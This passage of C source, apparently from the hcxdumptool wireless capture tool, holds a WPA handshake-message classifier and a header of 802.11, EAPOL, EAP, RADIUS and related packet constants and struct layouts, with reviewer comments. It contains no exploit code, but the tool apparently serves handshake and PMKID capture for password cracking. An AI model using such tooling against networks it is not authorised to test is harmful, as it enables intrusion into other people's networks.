 *   ACK set, INSTALL clear    -> 1   (AP -> STA)
 *   ACK clear, SECURE set     -> 4   (STA -> AP)
 *   ACK clear, SECURE clear   -> 2   (STA -> AP)
 * Every path returns inside the if/else, so the final return 0 is
 * unreachable. Frames that are not 4-way-handshake messages (e.g. group key
 * exchanges) still map onto one of these four values; the caller must decide
 * beforehand whether the frame is a pairwise key frame at all.
 */
int getkeyinfo(uint16_t ki)
{
if(ki & WPA_KEY_INFO_ACK)
	{
	if(ki & WPA_KEY_INFO_INSTALL)
		{
		/* handshake 3 */
		return 3;
		}
	else
		{
		/* handshake 1 */
		return 1;
		}
	}
else
	{
	if(ki & WPA_KEY_INFO_SECURE)
		{
		/* handshake 4 */
		return 4;
		}
	else
		{
		/* handshake 2 */
		return 2;
		}
	}
return 0;
}
/*===========================================================================*/
hcxdumptool-5.1.7/include/ieee80211.h000066400000000000000000000565631350370021700172040ustar00rootroot00000000000000#define MYREPLAYCOUNT 63232
/* ieee80211.h: 802.11 constants and packed frame layouts (continues past
 * this point in the file) */
/* 802.11 MAC header sizes in bytes for the different frame formats */
#define MAC_SIZE_ACK (10)
#define MAC_SIZE_RTS (16)
#define MAC_SIZE_NORM (24)
#define MAC_SIZE_QOS (26)
#define MAC_SIZE_LONG (30)
#define MAC_SIZE_QOS_LONG (32)
#define FCS_LEN 4
/* types */
#define IEEE80211_FTYPE_MGMT 0x0
#define IEEE80211_FTYPE_CTL 0x1
#define IEEE80211_FTYPE_DATA 0x2
#define IEEE80211_FTYPE_RCVD 0x3
/* management */
#define IEEE80211_STYPE_ASSOC_REQ 0x0
#define IEEE80211_STYPE_ASSOC_RESP 0x1
#define IEEE80211_STYPE_REASSOC_REQ 0x2
#define IEEE80211_STYPE_REASSOC_RESP 0x3
#define IEEE80211_STYPE_PROBE_REQ 0x4
#define IEEE80211_STYPE_PROBE_RESP 0x5
#define IEEE80211_STYPE_BEACON 0x8
#define IEEE80211_STYPE_ATIM 0x9
#define IEEE80211_STYPE_DISASSOC 0xa
#define IEEE80211_STYPE_AUTH 0xb
#define IEEE80211_STYPE_DEAUTH 0xc
#define IEEE80211_STYPE_ACTION 0xd
/* control */
#define IEEE80211_STYPE_CTL_EXT 0x6
#define 
IEEE80211_STYPE_BACK_REQ 0x8 #define IEEE80211_STYPE_BACK 0x9 #define IEEE80211_STYPE_PSPOLL 0xa #define IEEE80211_STYPE_RTS 0xb #define IEEE80211_STYPE_CTS 0xc #define IEEE80211_STYPE_ACK 0xd #define IEEE80211_STYPE_CFEND 0xe #define IEEE80211_STYPE_CFENDACK 0xf /* data */ #define IEEE80211_STYPE_DATA 0x0 #define IEEE80211_STYPE_DATA_CFACK 0x1 #define IEEE80211_STYPE_DATA_CFPOLL 0x2 #define IEEE80211_STYPE_DATA_CFACKPOLL 0x3 #define IEEE80211_STYPE_NULLFUNC 0x4 #define IEEE80211_STYPE_CFACK 0x5 #define IEEE80211_STYPE_CFPOLL 0x6 #define IEEE80211_STYPE_CFACKPOLL 0x7 #define IEEE80211_STYPE_QOS_DATA 0x8 #define IEEE80211_STYPE_QOS_DATA_CFACK 0x9 #define IEEE80211_STYPE_QOS_DATA_CFPOLL 0xa #define IEEE80211_STYPE_QOS_DATA_CFACKPOLL 0xb #define IEEE80211_STYPE_QOS_NULLFUNC 0xc #define IEEE80211_STYPE_QOS_CFACK 0xd #define IEEE80211_STYPE_QOS_CFPOLL 0xe #define IEEE80211_STYPE_QOS_CFACKPOLL 0xf /* Reason codes (IEEE 802.11-2007, 7.3.1.7, Table 7-22) */ #define WLAN_REASON_UNSPECIFIED 1 #define WLAN_REASON_PREV_AUTH_NOT_VALID 2 #define WLAN_REASON_DEAUTH_LEAVING 3 #define WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 4 #define WLAN_REASON_DISASSOC_AP_BUSY 5 #define WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 6 #define WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA 7 #define WLAN_REASON_DISASSOC_STA_HAS_LEFT 8 #define WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH 9 /* IEEE 802.11h */ #define WLAN_REASON_PWR_CAPABILITY_NOT_VALID 10 #define WLAN_REASON_SUPPORTED_CHANNEL_NOT_VALID 11 /* IEEE 802.11i */ #define WLAN_REASON_INVALID_IE 13 #define WLAN_REASON_MICHAEL_MIC_FAILURE 14 #define WLAN_REASON_4WAY_HANDSHAKE_TIMEOUT 15 #define WLAN_REASON_GROUP_KEY_UPDATE_TIMEOUT 16 #define WLAN_REASON_IE_IN_4WAY_DIFFERS 17 #define WLAN_REASON_GROUP_CIPHER_NOT_VALID 18 #define WLAN_REASON_PAIRWISE_CIPHER_NOT_VALID 19 #define WLAN_REASON_AKMP_NOT_VALID 20 #define WLAN_REASON_UNSUPPORTED_RSN_IE_VERSION 21 #define WLAN_REASON_INVALID_RSN_IE_CAPAB 22 #define WLAN_REASON_IEEE_802_1X_AUTH_FAILED 23 #define 
WLAN_REASON_CIPHER_SUITE_REJECTED 24 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define WBIT(n) (1 << (n)) #define WPA_KEY_INFO_TYPE_MASK (WBIT(0) | WBIT(1) | WBIT(2)) #define WPA_KEY_INFO_TYPE_HMAC_MD5_RC4 WBIT(0) #define WPA_KEY_INFO_TYPE_HMAC_SHA1_AES WBIT(1) #define WPA_KEY_INFO_KEY_TYPE WBIT(3) /* 1 = Pairwise, 0 = Group key */ #define WPA_KEY_INFO_KEY_INDEX_MASK (WBIT(4) | WBIT(5)) #define WPA_KEY_INFO_KEY_INDEX_SHIFT 4 #define WPA_KEY_INFO_INSTALL WBIT(6) /* pairwise */ #define WPA_KEY_INFO_TXRX WBIT(6) /* group */ #define WPA_KEY_INFO_ACK WBIT(7) #define WPA_KEY_INFO_MIC WBIT(8) #define WPA_KEY_INFO_SECURE WBIT(9) #define WPA_KEY_INFO_ERROR WBIT(10) #define WPA_KEY_INFO_REQUEST WBIT(11) #define WPA_KEY_INFO_ENCR_KEY_DATA WBIT(12) /* IEEE 802.11i/RSN only */ /*===========================================================================*/ struct radiotap_header { uint8_t it_version; uint8_t it_pad; uint16_t it_len; uint32_t it_present; } __attribute__((__packed__)); typedef struct radiotap_header rth_t; #define RTH_SIZE (sizeof(rth_t)) /*===========================================================================*/ struct ethernet2_header { uint8_t addr1[6]; uint8_t addr2[6]; uint16_t ether_type; } __attribute__((packed)); typedef struct ethernet2_header eth2_t; #define ETH2_SIZE (sizeof(eth2_t)) /*===========================================================================*/ struct loopback_header { uint32_t family; } __attribute__((packed)); typedef struct loopback_header loba_t; #define LOBA_SIZE (sizeof(loba_t)) /*===========================================================================*/ #define WLAN_DEVNAMELEN_MAX 16 struct prism_item { uint32_t did; uint16_t status; uint16_t len; uint32_t data; } __attribute__((packed)); struct prism_header { uint32_t msgcode; uint32_t msglen; char devname[WLAN_DEVNAMELEN_MAX]; struct prism_item hosttime; struct prism_item mactime; struct prism_item channel; struct prism_item rssi; struct 
prism_item sq; struct prism_item signal; struct prism_item noise; struct prism_item rate; struct prism_item istx; struct prism_item frmlen; } __attribute__((packed)); typedef struct prism_item prism_item_t; typedef struct prism_header prism_t; #define PRISM_SIZE (sizeof(prism_t)) /*===========================================================================*/ struct avs_header { uint32_t version; uint32_t len; uint64_t mactime; uint64_t hosttime; uint32_t phytype; uint32_t channel; uint32_t datarate; uint32_t antenna; uint32_t priority; uint32_t ssi_type; int32_t ssi_signal; int32_t ssi_noise; uint32_t preamble; uint32_t encoding; } __attribute__((packed)); typedef struct avs_header avs_t; #define AVS_SIZE (sizeof(avs_t)) /*===========================================================================*/ struct ppi_header { uint8_t pph_version; uint8_t pph_flags; uint16_t pph_len; uint32_t pph_dlt; } __attribute__((packed)); typedef struct ppi_header ppi_t; #define PPI_SIZE (sizeof(ppi_t)) /*===========================================================================*/ struct msnetmon_header { uint8_t version_minor; uint8_t version_major; uint16_t network; uint16_t ts_year; uint16_t ts_month; uint16_t ts_weekday; uint16_t ts_day; uint16_t ts_hour; uint16_t ts_min; uint16_t ts_sec; uint16_t ts_msec; uint32_t frametableoffset; uint32_t frametablelength; uint32_t userdataoffset; uint32_t userdatalength; uint32_t commentdataoffset; uint32_t commentdatalength; uint32_t statisticsoffset; uint32_t statisticslength; uint32_t networkinfooffset; uint32_t networkinfolength; } __attribute__((packed)); typedef struct msnetmon_header msntm_t; #define MSNETMON_SIZE (sizeof(msntm_t)) /*===========================================================================*/ struct fcs_frame { uint32_t fcs; }; typedef struct fcs_frame fcs_t; #define FCS_SIZE (sizeof(fcs_t)) /*===========================================================================*/ struct qos_frame { uint8_t control; uint8_t 
flags; } __attribute__((__packed__)); typedef struct qos_frame qos_t; #define QOS_SIZE (sizeof(qos_t)) /*===========================================================================*/ /* * DS bit usage * * TA = transmitter address * RA = receiver address * DA = destination address * SA = source address * * ToDS FromDS A1(RA) A2(TA) A3 A4 Use * ----------------------------------------------------------------- * 0 0 DA SA BSSID - IBSS/DLS * 0 1 DA BSSID SA - AP -> STA * 1 0 BSSID SA DA - AP <- STA * 1 1 RA TA DA SA unspecified (WDS) */ struct mac_frame { #ifdef BIG_ENDIAN_HOST unsigned subtype : 4; unsigned type : 2; unsigned version : 2; unsigned ordered : 1; unsigned protected : 1; unsigned more_data : 1; unsigned power : 1; unsigned retry : 1; unsigned more_frag : 1; unsigned from_ds : 1; unsigned to_ds : 1; #else unsigned version : 2; unsigned type : 2; unsigned subtype : 4; unsigned to_ds : 1; unsigned from_ds : 1; unsigned more_frag : 1; unsigned retry : 1; unsigned power : 1; unsigned more_data : 1; unsigned protected : 1; unsigned ordered : 1; #endif uint16_t duration; uint8_t addr1[6]; uint8_t addr2[6]; uint8_t addr3[6]; uint16_t sequence; uint8_t addr4[6]; qos_t qos; } __attribute__((__packed__)); typedef struct mac_frame mac_t; /*===========================================================================*/ struct capabilities_ap_frame { uint64_t timestamp; uint16_t beaconintervall; uint16_t capabilities; } __attribute__((__packed__)); typedef struct capabilities_ap_frame capap_t; #define CAPABILITIESAP_SIZE sizeof(capap_t) /*===========================================================================*/ struct capabilities_sta_frame { uint16_t capabilities; uint16_t listeninterval; } __attribute__((__packed__)); typedef struct capabilities_sta_frame capsta_t; #define CAPABILITIESSTA_SIZE sizeof(capsta_t) /*===========================================================================*/ struct capabilitiesreq_sta_frame { uint16_t capabilities; uint16_t 
	listeninterval;
	uint8_t addr[6];
} __attribute__((__packed__));
typedef struct capabilitiesreq_sta_frame capreqsta_t;
#define CAPABILITIESREQSTA_SIZE sizeof(capreqsta_t)
/*===========================================================================*/
/* Generic information element: 1-byte id, 1-byte len, then len bytes of data.
 * data[1] is a placeholder; IETAG_SIZE (= 2) is the header length via
 * offsetof, so that the placeholder byte is not counted.
 * NOTE(review): len is taken from the received frame. Every caller that
 * walks IEs must check id/len against the bytes actually remaining in the
 * frame before touching data[] — the struct itself gives no protection. */
struct ie_tag
{
	uint8_t id;
#define TAG_SSID 0x00
#define TAG_RATE 0x01
#define TAG_CHAN 0x03
#define TAG_RSN 0x30
	uint8_t len;
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct ie_tag ietag_t;
#define IETAG_SIZE offsetof(ietag_t, data)
/*===========================================================================*/
/* Head of the RSN information element (id 0x30): tag header plus the
 * 16-bit RSN version (4 packed bytes). */
struct rsn_tag
{
	uint8_t id;
	uint8_t len;
	uint16_t version;
} __attribute__((__packed__));
typedef struct rsn_tag rsntag_t;
#define RSNTAG_SIZE sizeof(rsntag_t)
/*===========================================================================*/
/* Vendor-specific information element: tag header, 3-byte OUI, then data.
 * VENDORTAG_SIZE (= 5) excludes the data[1] placeholder. The meaning of
 * VENDORTAG_AUTH_SIZE (11) is not visible here — see its users. */
struct vendor_tag
{
	uint8_t tagnr;
	uint8_t taglen;
	uint8_t oui[3];
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct vendor_tag vendor_t;
#define VENDORTAG_SIZE offsetof(vendor_t, data)
#define VENDORTAG_AUTH_SIZE 0x0b
/*===========================================================================*/
/* LLC/SNAP header (8 bytes). Not marked packed, but every member is naturally
 * aligned at its offset (the uint16_t sits at offset 6), so sizeof is 8 anyway.
 * The LLC_TYPE_* values are Ethertypes carried in `type`; LLC_SNAP (0xaa) is
 * presumably what dsap/ssap are compared against. */
struct llc_frame
{
	uint8_t dsap;
	uint8_t ssap;
	uint8_t control;
	uint8_t org[3];
	uint16_t type;
#define LLC_TYPE_AUTH 0x888e
#define LLC_TYPE_IPV4 0x0800
#define LLC_TYPE_IPV6 0x86dd
#define LLC_TYPE_PREAUT 0x88c7
#define LLC_TYPE_FRRR 0x890d
};
typedef struct llc_frame llc_t;
#define LLC_SIZE (sizeof(llc_t))
#define LLC_SNAP 0xaa
/*===========================================================================*/
/* Fixed body of an 802.11 authentication frame (6 packed bytes): algorithm
 * number (values listed below), transaction sequence number, status code. */
struct authentication_frame
{
	uint16_t authentication_algho;
#define OPEN_SYSTEM 0
#define SHARED_KEY 1
#define FBT 2
#define SAE 3
#define FILS 4
#define FILSPFS 5
#define FILSPK 6
#define NETWORKEAP 128
	uint16_t authentication_seq;
	uint16_t statuscode;
} __attribute__((__packed__));
typedef struct authentication_frame authf_t;
#define AUTHENTICATIONFRAME_SIZE (sizeof(authf_t))
/*===========================================================================*/
/* SAE commit message body following authf_t: group id, scalar and the two
 * element coordinates. The fixed 32-byte sizes only fit groups with a
 * 256-bit prime order (e.g. group 19); other groups would need other sizes —
 * assumed, confirm against the users of this struct. */
struct sae_commit_authentication_frame
{
	uint16_t group_id;
	uint8_t scalar[32];
	uint8_t commit_element_x[32];
	uint8_t commit_element_y[32];
} __attribute__((__packed__));
typedef struct sae_commit_authentication_frame saecommitauthf_t;
#define SAECOMMITAUTHENTICATIONFRAME_SIZE (sizeof(saecommitauthf_t))
/*===========================================================================*/
/* SAE confirm message body: send-confirm counter plus a 32-byte confirm value. */
struct sae_confirm_authentication_frame
{
	uint16_t send_confirm;
	uint8_t confirm[32];
} __attribute__((__packed__));
typedef struct sae_confirm_authentication_frame saeconfirmauthf_t;
#define SAECONFIRMAUTHENTICATIONFRAME_SIZE (sizeof(saeconfirmauthf_t))
/*===========================================================================*/
/* Fixed part of an association response as laid out by this tool
 * (4 x uint16_t = 8 packed bytes). */
struct association_resp_frame
{
	uint16_t capabilities;
	uint16_t authentication_seq;
	uint16_t statuscode;
	uint16_t id;
} __attribute__((__packed__));
typedef struct association_resp_frame assocrepf_t;
#define ASSOCIATIONRESPFRAME_SIZE (sizeof(assocrepf_t))
/*===========================================================================*/
/* First two bytes of an action frame body: category and action code.
 * NOTE(review): ACT_ADD_BLOCK_ACK_RESP is defined with the same value (0) as
 * ACT_ADD_BLOCK_ACK_REQ; the standard numbers the ADDBA response as 1 —
 * confirm whether 0 is intended before relying on it to tell the two apart. */
struct action_frame
{
	uint8_t categoriecode;
#define CAT_BLOCK_ACK 3
#define CAT_RADIO_MEASUREMENT 5
	uint8_t actioncode;
#define ACT_ADD_BLOCK_ACK_REQ 0
#define ACT_ADD_BLOCK_ACK_RESP 0
#define ACT_DELETE_BLOCK_REQ 2
#define ACT_RADIO_MEASUREMENT_REQ 0
};
typedef struct action_frame actf_t;
#define ACTIONFRAME_SIZE (sizeof(actf_t))
/*===========================================================================*/
/* EAPOL (802.1X) header: version, packet type (values below), body length,
 * then the body. EAPAUTH_SIZE (= 4) excludes the data[1] placeholder.
 * NOTE(review): len is frame-supplied; bound it by the remaining frame
 * length before trusting it. */
struct eapauthentication_frame
{
	uint8_t version;
	uint8_t type;
#define EAP_PACKET 0
#define EAPOL_START 1
#define EAPOL_LOGOFF 2
#define EAPOL_KEY 3
#define EAPOL_ASF 4
#define EAPOL_MKA 5
	uint16_t len;
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct eapauthentication_frame eapauth_t;
#define EAPAUTH_SIZE offsetof(eapauth_t, data)
/*===========================================================================*/
/* EAPOL-Key frame body (WPA/RSN 4-way handshake message). */
struct wpakey_frame
{
	uint8_t keydescriptor;
	uint16_t keyinfo;
	uint16_t keylen;
	uint64_t replaycount;
	uint8_t nonce[32];
	uint8_t keyiv[16];
	uint64_t keyrsc;
	uint8_t keyid[8];
	/* 16-byte MIC slot. Some newer AKMs use longer MICs, which this fixed
	 * layout would not fit — assumed, confirm against the parsing code. */
	uint8_t keymic[16];
	uint16_t wpadatalen;
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct wpakey_frame wpakey_t;
/* Header length without the data[1] placeholder (95 bytes). wpadatalen is
 * frame-supplied and must be checked against the remaining frame length. */
#define WPAKEY_SIZE offsetof(wpakey_t, data)
/*===========================================================================*/
/* RSN PMKID KDE as carried in the key data of EAPOL message 1:
 * tag id/len, OUI, KDE type, 16-byte PMKID (22 packed bytes). */
struct pmkid_frame
{
	uint8_t id;
	uint8_t len;
	uint8_t oui[3];
	uint8_t type;
	uint8_t pmkid[16];
} __attribute__((__packed__));
typedef struct pmkid_frame pmkid_t;
#define PMKID_SIZE (sizeof(pmkid_t))
/*===========================================================================*/
/* EAP packet header: code, identifier, length, method type. The EAP_TYPE_*
 * list is the method-type registry as used by this tool; EAP_TYPE_ID is
 * defined twice with the same value (allowed by the preprocessor, harmless).
 * EXTEAP_SIZE (= 5) excludes the data[1] placeholder; extlen is
 * frame-supplied and must be bounded by the remaining frame length. */
struct exteap_frame
{
	uint8_t code;
#define EAP_CODE_REQ 1
#define EAP_CODE_RESP 2
#define EAP_CODE_SUCCESS 3
#define EAP_CODE_FAILURE 4
#define EAP_CODE_INITIATE 5
#define EAP_CODE_FINISH 6
	uint8_t id;
#define EAP_TYPE_ID 1
	uint16_t extlen;
	uint8_t exttype;
#define EAP_TYPE_EAP 0
#define EAP_TYPE_ID 1
#define EAP_TYPE_NOTIFY 2
#define EAP_TYPE_NAK 3
#define EAP_TYPE_MD5 4
#define EAP_TYPE_OTP 5
#define EAP_TYPE_GTC 6
#define EAP_TYPE_RSA 9
#define EAP_TYPE_DSS 10
#define EAP_TYPE_KEA 11
#define EAP_TYPE_KEA_VALIDATE 12
#define EAP_TYPE_TLS 13
#define EAP_TYPE_AXENT 14
#define EAP_TYPE_RSA_SSID 15
#define EAP_TYPE_RSA_ARCOT 16
#define EAP_TYPE_LEAP 17
#define EAP_TYPE_SIM 18
#define EAP_TYPE_SRP_SHA1 19
#define EAP_TYPE_TTLS 21
#define EAP_TYPE_RAS 22
#define EAP_TYPE_AKA 23
#define EAP_TYPE_3COMEAP 24
#define EAP_TYPE_PEAP 25
#define EAP_TYPE_MSEAP 26
#define EAP_TYPE_MAKE 27
#define EAP_TYPE_CRYPTOCARD 28
#define EAP_TYPE_MSCHAPV2 29
#define EAP_TYPE_DYNAMICID 30
#define EAP_TYPE_ROB 31
#define EAP_TYPE_POTP 32
#define EAP_TYPE_MSTLV 33
#define EAP_TYPE_SENTRI 34
#define EAP_TYPE_AW 35
#define EAP_TYPE_CSBA 36
#define EAP_TYPE_AIRFORT 37
#define EAP_TYPE_HTTPD 38
#define EAP_TYPE_SS 39
#define EAP_TYPE_DC 40
#define EAP_TYPE_SPEKE 41
#define EAP_TYPE_MOBAC 42
#define EAP_TYPE_FAST 43
#define EAP_TYPE_ZLXEAP 44
#define EAP_TYPE_LINK 45
#define EAP_TYPE_PAX 46
#define EAP_TYPE_PSK 47
#define EAP_TYPE_SAKE 48
#define EAP_TYPE_IKEV2 49
#define EAP_TYPE_AKA1 50
#define EAP_TYPE_GPSK 51
#define EAP_TYPE_PWD 52
#define EAP_TYPE_EKE1 53
#define EAP_TYPE_PTEAP 54
#define EAP_TYPE_TEAP 55
#define EAP_TYPE_EXPAND 254
#define EAP_TYPE_EXPERIMENTAL 255
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct exteap_frame exteap_t;
#define EXTEAP_SIZE offsetof(exteap_t, data)
/*===========================================================================*/
/* EAP-LEAP packet: standard EAP header (code/id/len/type) followed by the
 * LEAP version, a reserved byte and the challenge/response length `count`.
 * EAPLEAP_SIZE (= 8) excludes the data[1] placeholder; both len and count
 * are frame-supplied and need bounding before data[] is read. */
struct eapleap_frame
{
	uint8_t code;
	uint8_t id;
	uint16_t len;
	uint8_t type;
	uint8_t version;
	uint8_t reserved;
	uint8_t count;
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct eapleap_frame eapleap_t;
#define EAPLEAP_SIZE offsetof(eapleap_t, data)
/*===========================================================================*/
/* CCMP/TKIP per-MPDU header: 3 PN bytes, key id byte, 4 extended IV bytes
 * (8 bytes; all uint8_t, so no padding despite the missing packed attribute). */
struct mpdu_frame
{
	uint8_t pn[3];
	uint8_t keyid;
	uint8_t exitiv[4];
};
typedef struct mpdu_frame mpdu_t;
#define MPDU_SIZE (sizeof(mpdu_t))
/*===========================================================================*/
/* EAP-MD5 packet: EAP header plus a 1-byte value length before the value.
 * MD5_SIZE (= 6) excludes the data[1] placeholder. */
struct md5_frame
{
	uint8_t code;
	uint8_t id;
	uint16_t len;
	uint8_t type;
	uint8_t data_len;
	uint8_t data[1];
} __attribute__((__packed__));
typedef struct md5_frame md5_t;
#define MD5_SIZE offsetof(md5_t, data)
/*===========================================================================*/
/* IPv4 header without options (20 packed bytes). ver_hlen carries version and
 * header length (IHL) in its two nibbles, so the real header may be longer
 * than sizeof(ipv4_t) — see IPV4_SIZE_MIN/MAX after the struct. */
struct ipv4_frame
{
	uint8_t ver_hlen;
	uint8_t tos;
	uint16_t len;
	uint16_t ipid;
	uint16_t flags_offset;
	uint8_t ttl;
	uint8_t nextprotocol;
#define NEXTHDR_HOP 0 /* Hop-by-hop option header. */
#define NEXTHDR_ICMP4 1 /* ICMP4 header */
#define NEXTHDR_TCP 6 /* TCP segment. */
#define NEXTHDR_UDP 17 /* UDP message. */
#define NEXTHDR_IPV6 41 /* IPv6 in IPv6 */
#define NEXTHDR_ROUTING 43 /* Routing header. */
#define NEXTHDR_FRAGMENT 44 /* Fragmentation/reassembly header. */
#define NEXTHDR_GRE 47 /* GRE header.
*/
#define NEXTHDR_ESP 50 /* Encapsulating security payload. */
#define NEXTHDR_AUTH 51 /* Authentication header. */
#define NEXTHDR_ICMP6 58 /* ICMP6 for IPv6. */
#define NEXTHDR_NONE 59 /* No next header */
#define NEXTHDR_DEST 60 /* Destination options header. */
#define NEXTHDR_SCTP 132 /* SCTP message. */
#define NEXTHDR_MOBILITY 135 /* Mobility header. */
#define NEXTHDR_MAX 255
	uint16_t checksum;
	uint8_t srcaddr[4];
	uint8_t dstaddr[4];
} __attribute__ ((packed));
typedef struct ipv4_frame ipv4_t;
#define IPV4_SIZE (sizeof(ipv4_t))
/* Bounds for the header length derived from the IHL nibble. NOTE(review):
 * an IHL of 15 gives at most 60 bytes; 64 here is a looser upper bound than
 * the protocol allows — harmless as a sanity limit, but not exact. */
#define IPV4_SIZE_MIN 20
#define IPV4_SIZE_MAX 64
/*===========================================================================*/
/* IPv6 fixed header (40 packed bytes). ver_class packs version, traffic
 * class and flow label; len is the payload length, not the total length. */
struct ipv6_frame
{
	uint32_t ver_class;
	uint16_t len;
	uint8_t nextprotocol;
	uint8_t hoplimint;
	uint8_t srcaddr[16];
	uint8_t dstaddr[16];
} __attribute__ ((packed));
typedef struct ipv6_frame ipv6_t;
#define IPV6_SIZE (sizeof(ipv6_t))
/*===========================================================================*/
/* TCP header. `len` is the data-offset byte (header length in 32-bit words,
 * hence the "x 4" note), so the options area is variable; TCP_SIZE_MIN (= 20)
 * is the fixed part via offsetof, excluding the options[1] placeholder. */
struct tcp_frame
{
	uint16_t sourceport;
	uint16_t destinationport;
	uint32_t sequencenumber;
	uint32_t acknumber;
	uint8_t len /* x 4 */;
	uint8_t flags;
	uint16_t window;
	uint16_t checksum;
	uint16_t urgent;
	uint8_t options[1];
} __attribute__ ((packed));
typedef struct tcp_frame tcp_t;
#define TCP_SIZE_MIN offsetof(tcp_t, options)
/*===========================================================================*/
/* UDP header (8 packed bytes). The UDP_* port constants are the services this
 * tool looks for in the port fields. */
struct udp_frame
{
	uint16_t sourceport;
	uint16_t destinationport;
#define UDP_DHCP_SERVERPORT 67
#define UDP_DHCP_CLIENTPORT 68
#define UDP_DHCP6_SERVERPORT 547
#define UDP_DHCP6_CLIENTPORT 546
#define UDP_RADIUS_DESTINATIONPORT 1812
#define UDP_TZSP_DESTINATIONPORT 37008
	uint16_t len;
	uint16_t checksum;
} __attribute__ ((packed));
typedef struct udp_frame udp_t;
#define UDP_SIZE (sizeof(udp_t))
/*===========================================================================*/
/* TZSP (TaZmen Sniffer Protocol) header: version, type, encapsulated
 * protocol (TZSP_ENCAP_* values), then tagged fields. */
struct tzsp_frame
{
	uint8_t version;
	uint8_t type;
	uint16_t enc_protocol;
#define TZSP_ENCAP_ETHERNET 1
#define
TZSP_ENCAP_TOKEN_RING 2
#define TZSP_ENCAP_SLIP 3
#define TZSP_ENCAP_PPP 4
#define TZSP_ENCAP_FDDI 5
#define TZSP_ENCAP_RAW 7
#define TZSP_ENCAP_IEEE_802_11 18
#define TZSP_ENCAP_IEEE_802_11_PRISM 119
#define TZSP_ENCAP_IEEE_802_11_AVS 127
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct tzsp_frame tzsp_t;
/* Fixed TZSP header length (= 4), excluding the data[1] placeholder. */
#define TZSP_SIZE offsetof(tzsp_t, data)
/*===========================================================================*/
/* TZSP tagged field: tag, length, value. TZSP_TAG_END has no length byte on
 * the wire, so a walker must test for it before reading len — assumed from
 * the protocol, confirm in the parsing code. */
struct tzsp_tag
{
	uint8_t tag;
#define TZSP_TAG_END 1
#define TZSP_TAG_ORGLEN 41
	uint8_t len;
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct tzsp_tag tzsptag_t;
#define TZSPTAG_SIZE offsetof(tzsptag_t, data)
/*===========================================================================*/
/* Enhanced GRE header as used by PPTP (8 packed bytes): flags/version word,
 * protocol type (GREPROTO_PPP), payload length, call id. The GRE_FLAG_* /
 * GRE_MASK_* constants apply to `flags`. */
struct gre_frame
{
	uint16_t flags;
	uint16_t type;
	uint16_t len;
	uint16_t callid;
} __attribute__ ((packed));
typedef struct gre_frame gre_t;
#define GRE_SIZE (sizeof(gre_t))
#define GREPROTO_PPP 0x880b
#define GRE_FLAG_SNSET 0x1000
#define GRE_FLAG_ACKSET 0x0080
#define GRE_MASK_VERSION 0x0003
/*===========================================================================*/
/* PPP protocol field (2 bytes); PROTO_PAP / PROTO_CHAP are the values of
 * interest to this tool. */
struct ptp_frame
{
	uint16_t type;
} __attribute__ ((packed));
typedef struct ptp_frame ptp_t;
#define PTP_SIZE (sizeof(ptp_t))
#define PROTO_PAP 0xc023
#define PROTO_CHAP 0xc223
/*===========================================================================*/
/* CHAP packet: code (CHAP_CODE_*), id, length, then the value/name data.
 * NOTE(review): unlike the sibling structs, CHAP_SIZE uses sizeof(), so it
 * includes the 1-byte data[] placeholder (5 instead of the 4-byte header).
 * Check that users of CHAP_SIZE expect 5, or switch it to
 * offsetof(chap_t, data) for consistency. */
struct chap_frame
{
	uint8_t code;
#define CHAP_CODE_REQ 1
#define CHAP_CODE_RESP 2
	uint8_t id;
	uint16_t len;
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct chap_frame chap_t;
#define CHAP_SIZE (sizeof(chap_t))
/*===========================================================================*/
/* TACACS+ packet header (12 packed bytes before the body). TACACSP_VERSION is
 * the expected value of `version`; `len` is the body length from the packet
 * and must be bounded by the bytes actually received. TACACSP_SIZE excludes
 * the data[1] placeholder. */
struct tacacsp_frame
{
	uint8_t version;
#define TACACSP_VERSION 0xc0
	uint8_t type;
#define TACACS_AUTHENTICATION 1
	uint8_t sequencenr;
	uint8_t flags;
	uint32_t sessionid;
	uint32_t len;
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct tacacsp_frame tacacsp_t;
#define TACACSP_SIZE offsetof(tacacsp_t, data)
/*===========================================================================*/
#define RADIUS_AUTHENTICATOR_LENGTH 16
#define RADIUS_PASSWORD_BLOCK_SIZE 16
#define RADIUS_HEADER_LENGTH 20
#define RADIUS_MAX_SIZE 1000
#define RADIUS_MAX_ATTRIBUTE_SIZE 253
/* RADIUS packet: 20-byte header (code, id, length, authenticator) followed by
 * an inline attribute area sized to RADIUS_MAX_SIZE. Because `attrs` is part
 * of the struct, RADIUS_SIZE is offsetof(data) = 1000, i.e. the maximum
 * packet size, NOT the header length — use RADIUS_HEADER_LENGTH for that.
 * `length` is packet-supplied; bound it by the received byte count. */
struct radius_frame_t
{
	uint8_t code;
	uint8_t id;
	uint16_t length;
	uint8_t authenticator[RADIUS_AUTHENTICATOR_LENGTH];
	uint8_t attrs[RADIUS_MAX_SIZE -RADIUS_HEADER_LENGTH];
	uint8_t data[1];
} __attribute__ ((packed));
typedef struct radius_frame_t radius_t;
#define RADIUS_SIZE offsetof(radius_t, data)
/*===========================================================================*/
/* global var */
/* All-zero 16-byte IV. */
static const uint8_t nulliv[] =
{
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
#define NULLIV_SIZE (sizeof(nulliv))
/* All-zero 32-byte nonce (used to detect an unset nonce, presumably). */
static const uint8_t nullnonce[] =
{
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
#define NULLNONCE_SIZE (sizeof(nullnonce))
